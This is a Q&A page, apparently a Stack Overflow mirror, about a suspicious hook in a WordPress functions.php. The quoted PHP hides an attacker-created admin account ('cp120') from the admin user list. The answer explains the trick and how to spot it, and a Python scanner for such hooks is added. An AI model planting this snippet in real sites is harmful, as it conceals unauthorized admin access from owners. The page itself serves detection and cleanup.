Question

I have a client that said they think their site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel it's not right?

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;
    if ($username == 'admin') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
    }
}

Solution

This code, or similar markup, is sometimes used by WordPress hackers. Once they gain access to your WordPress admin via malicious methods, they create a legitimate admin user and then put this code in your functions.php file so that when you go to your admin user section it only displays 1 user. Here is the trick to see if this has happened to you, in case you are unfamiliar with PHP or don't want to look through a long functions.php file. Go to your admin user area and it will only display the admin users that you know of; however, the number next to admin users will not match the number of displayed users. It will say (4) but only show 3 names.

As a note, this code can be used for legitimate reasons, so make sure, if you find this, that it wasn't done by your site's admin or developer.
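
For anyone who would rather not read a long functions.php by eye, the check can be scripted. The following is an added example, not part of the original answer: it scans PHP source for callbacks hooked to `pre_user_query` and reports any login excluded from the user query. The helper names are hypothetical, the sample input is constructed from the question's snippet, and the scan assumes string callbacks and uses naive brace counting. As noted above, a hit still needs to be checked against what the site's admin or developer put there.

```python
import re

# Constructed sample input: the snippet from the question inside a theme's functions.php.
SAMPLE = r"""<?php
add_action('after_setup_theme', 'mytheme_setup');
function mytheme_setup() { add_theme_support('title-tag'); }
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;
    if ($username == 'admin') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'", $user_search->query_where);
    }
}
"""

# Callbacks registered on the pre_user_query hook (string callbacks only).
HOOK_RE = re.compile(r"add_(?:action|filter)\s*\(\s*['\"]pre_user_query['\"]\s*,\s*['\"](\w+)['\"]")
# A login being excluded in SQL text, e.g. user_login != 'name'.
EXCLUDE_RE = re.compile(r"user_login\s*(?:!=|<>)\s*['\"]([^'\"]+)['\"]")

def function_body(source, name):
    """Return the body of a named PHP function using naive brace counting."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", source)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(source) and depth:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    return source[m.end():i - 1]

def scan_functions_php(source):
    """Flag pre_user_query callbacks that rewrite query_where to hide accounts."""
    findings = []
    for callback in HOOK_RE.findall(source):
        body = function_body(source, callback)
        findings.append({
            "callback": callback,
            "rewrites_where": "query_where" in body,
            "excluded_logins": EXCLUDE_RE.findall(body),
        })
    return findings

if __name__ == "__main__":
    for finding in scan_functions_php(SAMPLE):
        print(finding)
```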

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow